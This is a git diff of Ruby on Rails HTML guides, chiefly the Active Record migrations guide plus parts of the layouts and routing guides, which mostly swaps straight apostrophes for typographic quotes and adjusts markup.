    That’s it. The News views will use the new layout, hiding the top menu and adding a new right menu inside the "content" div.

    +

    There are several ways of getting similar results with differents sub-templating schemes using this technique. Note that there is no limit in nesting levels. One can use the ActionView::render method via render 'layouts/news\' to base a new layout on the News layout.

    4. Changelog

    - -
      + +
        +
      • +

        +December 27, 2007: Merge patch from Rodrigo Rosenfeld Rosas covering subtemplates +

        +
      • +
      • +

        +December 27, 2008: Information on new rendering defaults by Mike Gunderloy +

        +
      • November 9, 2008: Added partial collection counter by Mike Gunderloy diff --git a/railties/doc/guides/html/migrations.html b/railties/doc/guides/html/migrations.html index 9f7fa28daf..c4c2591234 100644 --- a/railties/doc/guides/html/migrations.html +++ b/railties/doc/guides/html/migrations.html @@ -204,7 +204,7 @@ ul#navMain {

      • Migrations are classes
      • -
      • What's in a name
      • +
      • What’s in a name
      • Changing migrations
      • @@ -279,10 +279,10 @@ ul#navMain {

        Migrations

        -

        Migrations are a convenient way for you to alter your database in a structured and organised manner. You could edit fragments of SQL by hand but you would then be responsible for telling other developers that they need to go and run it. You'd also have to keep track of which changes need to be run against the production machines next time you deploy. Active Record tracks which migrations have already been run so all you have to do is update your source and run rake db:migrate. Active Record will work out which migrations should be run. It will also update your db/schema.rb file to match the structure of your database.

        -

        Migrations also allow you to describe these transformations using Ruby. The great thing about this is that (like most of Active Record's functionality) it is database independent: you don't need to worry about the precise syntax of CREATE TABLE any more that you worry about variations on SELECT * (you can drop down to raw SQL for database specific features). For example you could use SQLite3 in development, but MySQL in production.

        -

        You'll learn all about migrations including:

        -
          +

          Migrations are a convenient way for you to alter your database in a structured and organised manner. You could edit fragments of SQL by hand but you would then be responsible for telling other developers that they need to go and run it. You’d also have to keep track of which changes need to be run against the production machines next time you deploy. Active Record tracks which migrations have already been run so all you have to do is update your source and run rake db:migrate. Active Record will work out which migrations should be run. It will also update your db/schema.rb file to match the structure of your database.

          +

          Migrations also allow you to describe these transformations using Ruby. The great thing about this is that (like most of Active Record’s functionality) it is database independent: you don’t need to worry about the precise syntax of CREATE TABLE any more that you worry about variations on SELECT * (you can drop down to raw SQL for database specific features). For example you could use SQLite3 in development, but MySQL in production.

          +

          You’ll learn all about migrations including:

          +
          • The generators you can use to create them @@ -308,7 +308,7 @@ How they relate to schema.rb

          1. Anatomy Of A Migration

          -

          Before I dive into the details of a migration, here are a few examples of the sorts of things you can do:

          +

          Before I dive into the details of a migration, here are a few examples of the sorts of things you can do:

          def self.down drop_table :products end -end -
          -

          This migration adds a table called products with a string column called name and a text column called description. A primary key column called id will also be added, however since this is the default we do not need to ask for this. The timestamp columns created_at and updated_at which Active Record populates automatically will also be added. Reversing this migration is as simple as dropping the table.

          -

          Migrations are not limited to changing the schema. You can also use them to fix bad data in the database or populate new fields:

          +end
        +

        This migration adds a table called products with a string column called name and a text column called description. A primary key column called id will also be added, however since this is the default we do not need to ask for this. The timestamp columns created_at and updated_at which Active Record populates automatically will also be added. Reversing this migration is as simple as dropping the table.

        +

        Migrations are not limited to changing the schema. You can also use them to fix bad data in the database or populate new fields:

        def self.down remove_column :users, :receive_newsletter end -end -
        -

        This migration adds an receive_newsletter column to the users table. We want it to default to false for new users, but existing users are considered +end

        +

        This migration adds an receive_newsletter column to the users table. We want it to default to false for new users, but existing users are considered to have already opted in, so we use the User model to set the flag to true for existing users.

        @@ -360,9 +358,9 @@ to have already opted in, so we use the User model to set the flag to true

        1.1. Migrations are classes

        -

        A migration is a subclass of ActiveRecord::Migration that implements two class methods: up (perform the required transformations) and down (revert them).

        -

        Active Record provides methods that perform common data definition tasks in a database independent way (you'll read about them in detail later):

        -
          +

          A migration is a subclass of ActiveRecord::Migration that implements two class methods: up (perform the required transformations) and down (revert them).

          +

          Active Record provides methods that perform common data definition tasks in a database independent way (you’ll read about them in detail later):

          +
          • create_table @@ -409,24 +407,24 @@ to have already opted in, so we use the User model to set the flag to true

          -

          If you need to perform tasks specific to your database (for example create a foreign key constraint) then the execute function allows you to execute arbitrary SQL. A migration is just a regular Ruby class so you're not limited to these functions. For example after adding a column you could +

          If you need to perform tasks specific to your database (for example create a foreign key constraint) then the execute function allows you to execute arbitrary SQL. A migration is just a regular Ruby class so you’re not limited to these functions. For example after adding a column you could write code to set the value of that column for existing records (if necessary using your models).

          -

          On databases that support transactions with statements that change the schema (such as PostgreSQL), migrations are wrapped in a transaction. If the database does not support this (for example MySQL and SQLite) then when a migration fails the parts of it that succeeded will not be rolled back. You will have to unpick the changes that were made by hand.

          -

          1.2. What's in a name

          -

          Migrations are stored in files in db/migrate, one for each migration class. The name of the file is of the form YYYYMMDDHHMMSS_create_products.rb, that is to say a UTC timestamp identifying the migration followed by an underscore followed by the name of the migration. The migration class' name must match (the camelcased version of) the latter part of the file name. For example 20080906120000_create_products.rb should define CreateProducts and 20080906120001_add_details_to_products.rb should define AddDetailsToProducts. If you do feel the need to change the file name then you MUST update the name of the class inside or Rails will complain about a missing class.

          -

          Internally Rails only uses the migration's number (the timestamp) to identify them. Prior to Rails 2.1 the migration number started at 1 and was incremented each time a migration was generated. With multiple developers it was easy for these to clash requiring you to rollback migrations and renumber them. With Rails 2.1 this is largely avoided by using the creation time of the migration to identify them. You can revert to the old numbering scheme by setting config.active_record.timestamped_migrations to false in environment.rb.

          -

          The combination of timestamps and recording which migrations have been run allows Rails to handle common situations that occur with multiple developers.

          -

          For example Alice adds migrations 20080906120000 and 20080906123000 and Bob adds 20080906124500 and runs it. Alice finishes her changes and checks in her migrations and Bob pulls down the latest changes. Rails knows that it has not run Alice's two migrations so rake db:migrate would run them (even though Bob's migration with a later timestamp has been run), and similarly migrating down would not run their down methods.

          -

          Of course this is no substitution for communication within the team, for example if Alice's migration removed a table that Bob's migration assumed the existence of then trouble will still occur.

          +

          On databases that support transactions with statements that change the schema (such as PostgreSQL), migrations are wrapped in a transaction. If the database does not support this (for example MySQL and SQLite) then when a migration fails the parts of it that succeeded will not be rolled back. You will have to unpick the changes that were made by hand.

          +

          1.2. What’s in a name

          +

          Migrations are stored in files in ‘db/migrate`, one for each migration class. The name of the file is of the form YYYYMMDDHHMMSS_create_products.rb, that is to say a UTC timestamp identifying the migration followed by an underscore followed by the name of the migration. The migration class’ name must match (the camelcased version of) the latter part of the file name. For example 20080906120000_create_products.rb should define CreateProducts and 20080906120001_add_details_to_products.rb should define AddDetailsToProducts. If you do feel the need to change the file name then you MUST update the name of the class inside or Rails will complain about a missing class.

          +

          Internally Rails only uses the migration’s number (the timestamp) to identify them. Prior to Rails 2.1 the migration number started at 1 and was incremented each time a migration was generated. With multiple developers it was easy for these to clash requiring you to rollback migrations and renumber them. With Rails 2.1 this is largely avoided by using the creation time of the migration to identify them. You can revert to the old numbering scheme by setting config.active_record.timestamped_migrations to false in environment.rb.

          +

          The combination of timestamps and recording which migrations have been run allows Rails to handle common situations that occur with multiple developers.

          +

          For example Alice adds migrations 20080906120000 and 20080906123000 and Bob adds 20080906124500 and runs it. Alice finishes her changes and checks in her migrations and Bob pulls down the latest changes. Rails knows that it has not run Alice’s two migrations so rake db:migrate would run them (even though Bob’s migration with a later timestamp has been run), and similarly migrating down would not run their down methods.

          +

          Of course this is no substitution for communication within the team, for example if Alice’s migration removed a table that Bob’s migration assumed the existence of then trouble will still occur.

          1.3. Changing migrations

          -

          Occasionally you will make a mistake while writing a migration. If you have already run the migration then you cannot just edit the migration and run the migration again: Rails thinks it has already run the migration and so will do nothing when you run rake db:migrate. You must rollback the migration (for example with rake db:rollback), edit your migration and then run rake db:migrate to run the corrected version.

          -

          In general editing existing migrations is not a good idea: you will be creating extra work for yourself and your co-workers and cause major headaches if the existing version of the migration has already been run on production machines. Instead you should write a new migration that performs the changes you require. Editing a freshly generated migration that has not yet been committed to source control (or more generally which has not been propagated beyond your development machine) is relatively harmless. Just use some common sense.

          +

          Occasionally you will make a mistake while writing a migration. If you have already run the migration then you cannot just edit the migration and run the migration again: Rails thinks it has already run the migration and so will do nothing when you run rake db:migrate. You must rollback the migration (for example with rake db:rollback), edit your migration and then run rake db:migrate to run the corrected version.

          +

          In general editing existing migrations is not a good idea: you will be creating extra work for yourself and your co-workers and cause major headaches if the existing version of the migration has already been run on production machines. Instead you should write a new migration that performs the changes you require. Editing a freshly generated migration that has not yet been committed to source control (or more generally which has not been propagated beyond your development machine) is relatively harmless. Just use some common sense.

          2. Creating A Migration

          2.1. Creating a model

          -

          The model and scaffold generators will create migrations appropriate for adding a new model. This migration will already contain instructions for creating the relevant table. If you tell Rails what columns you want then statements for adding those will also be created. For example, running

          -

          ruby script/generate model Product name:string description:text will create a migration that looks like this

          +

          The model and scaffold generators will create migrations appropriate for adding a new model. This migration will already contain instructions for creating the relevant table. If you tell Rails what columns you want then statements for adding those will also be created. For example, running

          +

          ruby script/generate model Product name:string description:text will create a migration that looks like this

          def self.down drop_table :products end -end -
          -

          You can append as many column name/type pairs as you want. By default t.timestamps (which creates the updated_at and created_at columns that +end

          +

          You can append as many column name/type pairs as you want. By default t.timestamps (which creates the updated_at and created_at columns that are automatically populated by Active Record) will be added for you.

          2.2. Creating a standalone migration

          -

          If you are creating migrations for other purposes (for example to add a column to an existing table) then you can use the migration generator:

          -

          ruby script/generate migration AddPartNumberToProducts

          -

          This will create an empty but appropriately named migration:

          +

          If you are creating migrations for other purposes (for example to add a column to an existing table) then you can use the migration generator:

          +

          ruby script/generate migration AddPartNumberToProducts

          +

          This will create an empty but appropriately named migration:

          def self.down end -end -
          -

          If the migration name is of the form AddXXXToYYY or RemoveXXXFromY and is followed by a list of column names and types then a migration containing +end

        +

        If the migration name is of the form AddXXXToYYY or RemoveXXXFromY and is followed by a list of column names and types then a migration containing the appropriate add and remove column statements will be created.

        -

        ruby script/generate migration AddPartNumberToProducts part_number:string

        -

        will generate

        +

        ruby script/generate migration AddPartNumberToProducts part_number:string

        +

        will generate

        def self.down remove_column :products, :part_number end -end -
        -

        Similarly,

        -

        ruby script/generate migration RemovePartNumberFromProducts part_number:string

        -

        generates

        +end
      +

      Similarly,

      +

      ruby script/generate migration RemovePartNumberFromProducts part_number:string

      +

      generates

      def self.down add_column :products, :part_number, :string end -end -
      -

      You are not limited to one magically generated column, for example

      -

      ruby script/generate migration AddDetailsToProducts part_number:string price:decimal

      -

      generates

      +end
    +

    You are not limited to one magically generated column, for example

    +

    ruby script/generate migration AddDetailsToProducts part_number:string price:decimal

    +

    generates

    remove_column :products, :price remove_column :products, :part_number end -end -
    -

    As always, what has been generated for you is just a starting point. You can add or remove from it as you see fit.

    +end +

    As always, what has been generated for you is just a starting point. You can add or remove from it as you see fit.

    3. Writing a Migration

    -

    Once you have created your migration using one of the generators it's time to get to work!

    +

    Once you have created your migration using one of the generators it’s time to get to work!

    3.1. Creating a table

    -

    create_table will be one of your workhorses. A typical use would be

    +

    create_table will be one of your workhorses. A typical use would be

    create_table :products do |t|
       t.string :name
    -end
    -
    -

    which creates a products table with a column called name (and as discussed below, an implicit id column).

    -

    The object yielded to the block allows you create columns on the table. There are two ways of doing this. The first looks like

    +end
    +

    which creates a products table with a column called name (and as discussed below, an implicit id column).

    +

    The object yielded to the block allows you create columns on the table. There are two ways of doing this. The first looks like

    create_table :products do |t|
       t.column :name, :string, :null => false
    -end
    -
    -

    the second form, the so called "sexy" migrations, drops the somewhat redundant column method. Instead, the string, integer etc. methods create a column of that type. Subsequent parameters are identical.

    +end +

    the second form, the so called "sexy" migrations, drops the somewhat redundant column method. Instead, the string, integer etc. methods create a column of that type. Subsequent parameters are identical.

    create_table :products do |t|
       t.string :name, :null => false
    -end
    -
    -

    By default create_table will create a primary key called id. You can change the name of the primary key with the :primary_key option (don't forget to update the corresponding model) or if you don't want a primary key at all (for example for a HABTM join table) you can pass :id ⇒ false. If you need to pass database specific options you can place an sql fragment in the :options option. For example

    +end +

    By default create_table will create a primary key called id. You can change the name of the primary key with the :primary_key option (don’t forget to update the corresponding model) or if you don’t want a primary key at all (for example for a HABTM join table) you can pass :id => false. If you need to pass database specific options you can place an sql fragment in the :options option. For example

    create_table :products, :options => "ENGINE=BLACKHOLE" do |t|
       t.string :name, :null => false
    -end
    -
    -

    Will append ENGINE=BLACKHOLE to the sql used to create the table (when using MySQL the default is "ENGINE=InnoDB").

    -

    The types Active Record supports are :primary_key, :string, :text, :integer, :float, :decimal, :datetime, :timestamp, :time, :date, :binary, :boolean.

    -

    These will be mapped onto an appropriate underlying database type, for example with MySQL :string is mapped to VARCHAR(255). You can create columns of +end

    +

    Will append ENGINE=BLACKHOLE to the sql used to create the table (when using MySQL the default is "ENGINE=InnoDB").

    +

    The types Active Record supports are :primary_key, :string, :text, :integer, :float, :decimal, :datetime, :timestamp, :time, :date, :binary, :boolean.

    +

    These will be mapped onto an appropriate underlying database type, for example with MySQL :string is mapped to VARCHAR(255). You can create columns of types not supported by Active Record when using the non sexy syntax, for example

    create_table :products do |t|
       t.column :name, 'polygon', :null => false
    -end
    -
    -

    This may however hinder portability to other databases.

    +end +

    This may however hinder portability to other databases.

    3.2. Changing tables

    -

    create_table's close cousin is change_table. Used for changing existing tables, it is used in a similar fashion to create_table but the object yielded to the block knows more tricks. For example

    +

    create_table's close cousin is change_table. Used for changing existing tables, it is used in a similar fashion to create_table but the object yielded to the block knows more tricks. For example

    t.string :part_number t.index :part_number t.rename :upccode, :upc_code -end -
    -

    removes the description column, creates a part_number column and adds an index on it. Finally it renames the upccode column. This is the same as doing

    +end +

    removes the description column, creates a part_number column and adds an index on it. Finally it renames the upccode column. This is the same as doing

    remove_column :products, :name add_column :products, :part_number, :string add_index :products, :part_number -rename_column :products, :upccode, :upc_code -
    -

    You don't have to keep repeating the table name and it groups all the statements related to modifying one particular table. The individual transformation names are also shorter, for example remove_column becomes just remove and add_index becomes just index.

    +rename_column :products, :upccode, :upc_code +

    You don’t have to keep repeating the table name and it groups all the statements related to modifying one particular table. The individual transformation names are also shorter, for example remove_column becomes just remove and add_index becomes just index.

    3.3. Special helpers

    -

    Active Record provides some shortcuts for common functionality. It is for example very common to add both the created_at and updated_at columns and so there is a method that does exactly that:

    +

    Active Record provides some shortcuts for common functionality. It is for example very common to add both the created_at and updated_at columns and so there is a method that does exactly that:

    create_table :products do |t|
       t.timestamps
    -end
    -
    -

    will create a new products table with those two columns whereas

    +end +

    will create a new products table with those two columns whereas

    change_table :products do |t|
       t.timestamps
    -end
    -
    -

    adds those columns to an existing table.

    -

    The other helper is called references (also available as belongs_to). In its simplest form it just adds some readability

    +end +

    adds those columns to an existing table.

    +

    The other helper is called references (also available as belongs_to). In its simplest form it just adds some readability

    create_table :products do |t|
       t.references :category
    -end
    -
    -

    will create a category_id column of the appropriate type. Note that you pass the model name, not the column name. Active Record adds the _id for you. If you have polymorphic belongs_to associations then references will add both of the columns required:

    +end +

    will create a category_id column of the appropriate type. Note that you pass the model name, not the column name. Active Record adds the _id for you. If you have polymorphic belongs_to associations then references will add both of the columns required:

    create_table :products do |t|
       t.references :attachment, :polymorphic => {:default => 'Photo'}
    -end
    -
    -

    will add an attachment_id column and a string attachment_type column with a default value of Photo.

    +end +

    will add an attachment_id column and a string attachment_type column with a default value of Photo.

    @@ -662,10 +644,10 @@ http://www.gnu.org/software/src-highlite --> The references helper does not actually create foreign key constraints for you. You will need to use execute for that or a plugin that adds foreign key support.
    -

    If the helpers provided by Active Record aren't enough you can use the execute function to execute arbitrary SQL.

    -

    For more details and examples of individual methods check the API documentation, in particular the documentation for ActiveRecord::ConnectionAdapters::SchemaStatements (which provides the methods available in the up and down methods), ActiveRecord::ConnectionAdapters::TableDefinition (which provides the methods available on the object yielded by create_table) and ActiveRecord::ConnectionAdapters::Table (which provides the methods available on the object yielded by change_table).

    +

    If the helpers provided by Active Record aren’t enough you can use the execute function to execute arbitrary SQL.

    +

    For more details and examples of individual methods check the API documentation, in particular the documentation for ActiveRecord::ConnectionAdapters::SchemaStatements (which provides the methods available in the up and down methods), ActiveRecord::ConnectionAdapters::TableDefinition (which provides the methods available on the object yielded by create_table) and ActiveRecord::ConnectionAdapters::Table (which provides the methods available on the object yielded by change_table).

    3.4. Writing your down method

    -

    The down method of your migration should revert the transformations done by the up method. In other words the database should be unchanged if you do an up followed by a down. For example if you create a table in the up you should drop it in the down method. It is wise to do things in precisely the reverse order to in the up method. For example

    +

    The down method of your migration should revert the transformations done by the up method. In other words the database should be unchanged if you do an up followed by a down. For example if you create a table in the up you should drop it in the down method. It is wise to do things in precisely the reverse order to in the up method. For example

    execute "ALTER TABLE products DROP FOREIGN KEY fk_products_categories" drop_table :products end -end -
    -

    Sometimes your migration will do something which is just plain irreversible, for example it might destroy some data. In cases like those when you can't reverse the migration you can raise IrreversibleMigration from your down method. If someone tries to revert your migration an error message will be -displayed saying that it can't be done.

    +end +

    Sometimes your migration will do something which is just plain irreversible, for example it might destroy some data. In cases like those when you can’t reverse the migration you can raise IrreversibleMigration from your down method. If someone tries to revert your migration an error message will be +displayed saying that it can’t be done.

    4. Running Migrations

    -

    Rails provides a set of rake tasks to work with migrations which boils down to running certain sets of migrations. The very first migration related rake task you use will probably be db:migrate. In its most basic form it just runs the up method for all the migrations that have not yet been run. If there are no such migrations it exits.

    -

    Note that running the db:migrate also invokes the db:schema:dump task, which will update your db/schema.rb file to match the structure of your database.

    -

    If you specify a target version, Active Record will run the required migrations (up or down) until it has reached the specified version. The -version is the numerical prefix on the migration's filename. For example to migrate to version 20080906120000 run

    +

    Rails provides a set of rake tasks to work with migrations which boils down to running certain sets of migrations. The very first migration related rake task you use will probably be db:migrate. In its most basic form it just runs the up method for all the migrations that have not yet been run. If there are no such migrations it exits.

    +

    Note that running the db:migrate also invokes the db:schema:dump task, which will update your db/schema.rb file to match the structure of your database.

    +

    If you specify a target version, Active Record will run the required migrations (up or down) until it has reached the specified version. The +version is the numerical prefix on the migration’s filename. For example to migrate to version 20080906120000 run

    rake db:migrate VERSION=20080906120000
    -

    If this is greater than the current version (i.e. it is migrating upwards) this will run the up method on all migrations up to and including 20080906120000, if migrating downwards this will run the down method on all the migrations down to, but not including, 20080906120000.

    +

    If this is greater than the current version (i.e. it is migrating upwards) this will run the up method on all migrations up to and including 20080906120000, if migrating downwards this will run the down method on all the migrations down to, but not including, 20080906120000.

    4.1. Rolling back

    -

    A common task is to rollback the last migration, for example if you made a mistake in it and wish to correct it. Rather than tracking down the version number associated with the previous migration you can run

    +

    A common task is to rollback the last migration, for example if you made a mistake in it and wish to correct it. Rather than tracking down the version number associated with the previous migration you can run

    rake db:rollback
    -

    This will run the down method from the latest migration. If you need to undo several migrations you can provide a STEP parameter:

    +

    This will run the down method from the latest migration. If you need to undo several migrations you can provide a STEP parameter:

    rake db:rollback STEP=3
    -

    will run the down method from the last 3 migrations.

    -

    The db:migrate:redo task is a shortcut for doing a rollback and then migrating back up again. As with the db:rollback task you can use the STEP parameter if you need to go more than one version back, for example

    +

    will run the down method from the last 3 migrations.

    +

    The db:migrate:redo task is a shortcut for doing a rollback and then migrating back up again. As with the db:rollback task you can use the STEP parameter if you need to go more than one version back, for example

    rake db:migrate:redo STEP=3
    -

    Neither of these Rake tasks do anything you could not do with db:migrate, they are simply more convenient since you do not need to explicitly specify the version to migrate to.

    -

    Lastly, the db:reset task will drop the database, recreate it and load the current schema into it.

    +

    Neither of these Rake tasks do anything you could not do with db:migrate, they are simply more convenient since you do not need to explicitly specify the version to migrate to.

    +

    Lastly, the db:reset task will drop the database, recreate it and load the current schema into it.

    @@ -735,14 +716,14 @@ version is the numerical prefix on the migration's filename. For example to migr

    4.2. Being Specific

    -

    If you need to run a specific migration up or down the db:migrate:up and db:migrate:down tasks will do that. Just specify the appropriate version and the corresponding migration will have its up or down method invoked, for example

    +

    If you need to run a specific migration up or down the db:migrate:up and db:migrate:down tasks will do that. Just specify the appropriate version and the corresponding migration will have its up or down method invoked, for example

    rake db:migrate:up VERSION=20080906120000
    -

    will run the up method from the 20080906120000 migration. These tasks check whether the migration has already run, so for example db:migrate:up VERSION=20080906120000 will do nothing if Active Record believes that 20080906120000 has already been run.

    +

    will run the up method from the 20080906120000 migration. These tasks check whether the migration has already run, so for example db:migrate:up VERSION=20080906120000 will do nothing if Active Record believes that 20080906120000 has already been run.

    4.3. Being talkative

    -

    By default migrations tell you exactly what they're doing and how long it took. +

    By default migrations tell you exactly what they’re doing and how long it took. A migration creating a table and adding an index might produce output like this

    @@ -753,8 +734,8 @@ A migration creating a table and adding an index might produce output like this< -> 0.0026s == 20080906170109 CreateProducts: migrated (0.0059s) ==========================
    -

    Several methods are provided that allow you to control all this:

    -
      +

      Several methods are provided that allow you to control all this:

      +
      • suppress_messages suppresses any output generated by its block @@ -771,7 +752,7 @@ A migration creating a table and adding an index might produce output like this<

      -

      For example, this migration

      +

      For example, this migration

      def self.down drop_table :products end -end -
      -

      generates the following output

      +end
    +

    generates the following output

    == 20080906170109 CreateProducts: migrating ===================================
    @@ -811,13 +791,13 @@ http://www.gnu.org/software/src-highlite -->
        -> 250 rows
     == 20080906170109 CreateProducts: migrated (10.0097s) =========================
    -

    If you just want Active Record to shut up then running rake db:migrate VERBOSE=false will suppress any output.

    +

    If you just want Active Record to shut up then running rake db:migrate VERBOSE=false will suppress any output.

    5. Using Models In Your Migrations

    -

    When creating or updating data in a migration it is often tempting to use one of your models. After all they exist to provide easy access to the underlying data. This can be done but some caution should be observed.

    -

    Consider for example a migration that uses the Product model to update a row in the corresponding table. Alice later updates the Product model, adding a new column and a validation on it. Bob comes back from holiday, updates the source and runs outstanding migrations with rake db:migrate, including the one that used the Product model. When the migration runs the source is up to date and so the Product model has the validation added by Alice. The database however is still old and so does not have that column and an error ensues because that validation is on a column that does not yet exist.

    -

    Frequently I just want to update rows in the database without writing out the SQL by hand: I'm not using anything specific to the model. One pattern for this is to define a copy of the model inside the migration itself, for example:

    +

    When creating or updating data in a migration it is often tempting to use one of your models. After all they exist to provide easy access to the underlying data. This can be done but some caution should be observed.

    +

    Consider for example a migration that uses the Product model to update a row in the corresponding table. Alice later updates the Product model, adding a new column and a validation on it. Bob comes back from holiday, updates the source and runs outstanding migrations with rake db:migrate, including the one that used the Product model. When the migration runs the source is up to date and so the Product model has the validation added by Alice. The database however is still old and so does not have that column and an error ensues because that validation is on a column that does not yet exist.

    +

    Frequently I just want to update rows in the database without writing out the SQL by hand: I’m not using anything specific to the model. One pattern for this is to define a copy of the model inside the migration itself, for example:

    def self.down ... end -end -
    -

    The migration has its own minimal copy of the Product model and no longer cares about the Product model defined in the application.

    +end
    +

    The migration has its own minimal copy of the Product model and no longer cares about the Product model defined in the application.

    5.1. Dealing with changing models

    -

    For performance reasons information about the columns a model has is cached. For example if you add a column to a table and then try and use the corresponding model to insert a new row it may try and use the old column information. You can force Active Record to re-read the column information with the reset_column_information method, for example

    +

    For performance reasons information about the columns a model has is cached. For example if you add a column to a table and then try and use the corresponding model to insert a new row it may try and use the old column information. You can force Active Record to re-read the column information with the reset_column_information method, for example

    def self.down ... end -end -
    +end

    6. Schema dumping and you

    6.1. What are schema files for?

    -

    Migrations, mighty as they may be, are not the authoritative source for your database schema. That role falls to either schema.rb or an SQL file which Active Record generates by examining the database. They are not designed to be edited, they just represent the current state of the database.

    -

    There is no need (and it is error prone) to deploy a new instance of an app by replaying the entire migration history. It is much simpler and faster to just load into the database a description of the current schema.

    -

    For example, this is how the test database is created: the current development database is dumped (either to schema.rb or development.sql) and then loaded into the test database.

    -

    Schema files are also useful if you want a quick look at what attributes an Active Record object has. This information is not in the model's code and is frequently spread across several migrations but is all summed up in the schema file. The annotate_models plugin, which automatically adds (and updates) comments at the top of each model summarising the schema, may also be of interest.

    +

    Migrations, mighty as they may be, are not the authoritative source for your database schema. That role falls to either schema.rb or an SQL file which Active Record generates by examining the database. They are not designed to be edited, they just represent the current state of the database.

    +

    There is no need (and it is error prone) to deploy a new instance of an app by replaying the entire migration history. It is much simpler and faster to just load into the database a description of the current schema.

    +

    For example, this is how the test database is created: the current development database is dumped (either to schema.rb or development.sql) and then loaded into the test database.

    +

    Schema files are also useful if you want a quick look at what attributes an Active Record object has. This information is not in the model’s code and is frequently spread across several migrations but is all summed up in the schema file. The annotate_models plugin, which automatically adds (and updates) comments at the top of each model summarising the schema, may also be of interest.

    6.2. Types of schema dumps

    -

    There are two ways to dump the schema. This is set in config/environment.rb by the config.active_record.schema_format setting, which may be either :sql or :ruby.

    -

    If :ruby is selected then the schema is stored in db/schema.rb. If you look at this file you'll find that it looks an awful lot like one very big migration:

    +

    There are two ways to dump the schema. This is set in config/environment.rb by the config.active_record.schema_format setting, which may be either :sql or :ruby.

    +

    If :ruby is selected then the schema is stored in db/schema.rb. If you look at this file you’ll find that it looks an awful lot like one very big migration:

    t.datetime "updated_at" t.string "part_number" end -end -
    -

    In many ways this is exactly what it is. This file is created by inspecting the database and expressing its structure using create_table, add_index and so on. Because this is database independent it could be loaded into any database that Active Record supports. This could be very useful if you were to distribute an application that is able to run against multiple databases.

    -

    There is however a trade-off: schema.rb cannot express database specific items such as foreign key constraints, triggers or stored procedures. While in a migration you can execute custom SQL statements, the schema dumper cannot reconstitute those statements from the database. If you are using features like this then you should set the schema format to :sql.

    -

    Instead of using Active Record's schema dumper the database's structure will be dumped using a tool specific to that database (via the db:structure:dump Rake task) into db/#{RAILS_ENV}_structure.sql. For example for PostgreSQL the pg_dump utility is used and for MySQL this file will contain the output of SHOW CREATE TABLE for the various tables. Loading this schema is simply a question of executing the SQL statements contained inside.

    -

    By definition this will be a perfect copy of the database's structure but this will usually prevent loading the schema into a database other than the one used to create it.

    +end
    +

    In many ways this is exactly what it is. This file is created by inspecting the database and expressing its structure using create_table, add_index and so on. Because this is database independent it could be loaded into any database that Active Record supports. This could be very useful if you were to distribute an application that is able to run against multiple databases.

    +

    There is however a trade-off: schema.rb cannot express database specific items such as foreign key constraints, triggers or stored procedures. While in a migration you can execute custom SQL statements, the schema dumper cannot reconstitute those statements from the database. If you are using features like this then you should set the schema format to :sql.

    +

    Instead of using Active Record’s schema dumper the database’s structure will be dumped using a tool specific to that database (via the db:structure:dump Rake task) into db/#{RAILS_ENV}_structure.sql. For example for PostgreSQL the pg_dump utility is used and for MySQL this file will contain the output of SHOW CREATE TABLE for the various tables. Loading this schema is simply a question of executing the SQL statements contained inside.

    +

    By definition this will be a perfect copy of the database’s structure but this will usually prevent loading the schema into a database other than the one used to create it.

    6.3. Schema dumps and source control

    -

    Because they are the authoritative source for your database schema, it is strongly recommended that you check them into source control.

    +

    Because they are the authoritative source for your database schema, it is strongly recommended that you check them into source control.

    7. Active Record and Referential Integrity

    -

    The Active Record way is that intelligence belongs in your models, not in the database. As such, features such as triggers or foreign key constraints, which push some of that intelligence back into the database are not heavily used.

    -

    Validations such as validates_uniqueness_of are one way in which models can enforce data integrity. The :dependent option on associations allows models to automatically destroy child objects when the parent is destroyed. Like anything which operates at the application level these cannot guarantee referential integrity and so some people augment them with foreign key constraints.

    -

    Although Active Record does not provide any tools for working directly with such features, the execute method can be used to execute arbitrary SQL. There are also a number of plugins such as redhillonrails which add foreign key support to Active Record (including support for dumping foreign keys in schema.rb).

    +

    The Active Record way is that intelligence belongs in your models, not in the database. As such, features such as triggers or foreign key constraints, which push some of that intelligence back into the database are not heavily used.

    +

    Validations such as validates_uniqueness_of are one way in which models can enforce data integrity. The :dependent option on associations allows models to automatically destroy child objects when the parent is destroyed. Like anything which operates at the application level these cannot guarantee referential integrity and so some people augment them with foreign key constraints.

    +

    Although Active Record does not provide any tools for working directly with such features, the execute method can be used to execute arbitrary SQL. There are also a number of plugins such as redhillonrails which add foreign key support to Active Record (including support for dumping foreign keys in schema.rb).

    8. Changelog

    - -
      + +
      • September 14, 2008: initial version by Frederick Cheung diff --git a/railties/doc/guides/html/routing_outside_in.html b/railties/doc/guides/html/routing_outside_in.html index bf45a8d046..d15d6208f5 100644 --- a/railties/doc/guides/html/routing_outside_in.html +++ b/railties/doc/guides/html/routing_outside_in.html @@ -323,8 +323,8 @@ ul#navMain {

        Rails Routing from the Outside In

        -

        This guide covers the user-facing features of Rails routing. By referring to this guide, you will be able to:

        -
          +

          This guide covers the user-facing features of Rails routing. By referring to this guide, you will be able to:

          +
          • Understand the purpose of routing @@ -350,25 +350,24 @@ Identify how a route will map to a controller and action

          1. The Dual Purpose of Routing

          -

          Rails routing is a two-way piece of machinery - rather as if you could turn trees into paper, and then turn paper back into trees. Specifically, it both connects incoming HTTP requests to the code in your application's controllers, and helps you generate URLs without having to hard-code them as strings.

          +

          Rails routing is a two-way piece of machinery - rather as if you could turn trees into paper, and then turn paper back into trees. Specifically, it both connects incoming HTTP requests to the code in your application’s controllers, and helps you generate URLs without having to hard-code them as strings.

          1.1. Connecting URLs to Code

          -

          When your Rails application receives an incoming HTTP request, say

          +

          When your Rails application receives an incoming HTTP request, say

          GET /patients/17
          -

          the routing engine within Rails is the piece of code that dispatches the request to the appropriate spot in your application. In this case, the application would most likely end up running the show action within the patients controller, displaying the details of the patient whose ID is 17.

          +

          the routing engine within Rails is the piece of code that dispatches the request to the appropriate spot in your application. In this case, the application would most likely end up running the show action within the patients controller, displaying the details of the patient whose ID is 17.

          1.2. Generating URLs from Code

          -

          Routing also works in reverse. If your application contains this code:

          +

          Routing also works in reverse. If your application contains this code:

          @patient = Patient.find(17)
          -<%= link_to "Patient Record", patient_path(@patient) %>
          -
          -

          Then the routing engine is the piece that translates that to a link to a URL such as http://example.com/patients/17. By using routing in this way, you can reduce the brittleness of your application as compared to one with hard-coded URLs, and make your code easier to read and understand.

          +<%= link_to "Patient Record", patient_path(@patient) %>
        +

        Then the routing engine is the piece that translates that to a link to a URL such as http://example.com/patients/17. By using routing in this way, you can reduce the brittleness of your application as compared to one with hard-coded URLs, and make your code easier to read and understand.

